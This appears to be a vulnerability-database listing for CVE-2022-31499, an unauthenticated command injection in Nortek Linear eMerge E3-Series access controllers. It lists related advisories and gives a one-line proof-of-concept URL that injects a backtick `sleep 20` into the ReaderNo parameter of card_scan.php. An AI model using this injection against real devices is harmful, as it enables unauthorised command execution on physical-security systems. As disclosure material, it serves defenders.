Nortek Linear eMerge E3-Series Command Injection Vulnerabilit
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
Packet Storm | Nortek Linear eMerge E3-Series Command Injection | 8 Aug 202200:00 | – | packetstorm |
Prion | Design/Logic Flaw | 25 Aug 202223:15 | – | prion |
Nuclei | Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection | 23 Sep 202217:28 | – | nuclei |
NVD | CVE-2022-31499 | 25 Aug 202223:15 | – | nvd |
Cvelist | CVE-2022-31499 | 25 Aug 202222:09 | – | cvelist |
CVE | CVE-2022-31499 | 25 Aug 202223:15 | – | cve |
# Exploit Title: Nortek Linear eMerge E3-Series - Blind OS Command Injection
# Exploit Author: Omar Hashim
# Version: 0.32-09c
# Vendor home page: https://www.nortekcontrol.com/access-control/
# Vendor home page: https://linear-solutions.com/
# Authentication Required: No
# CVE: CVE-2022-31499
# POC:
====================
http:/<HOST:PORT>/card_scan.php?No=1337&ReaderNo=`sleep
20`&CardFormatNo=1337
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo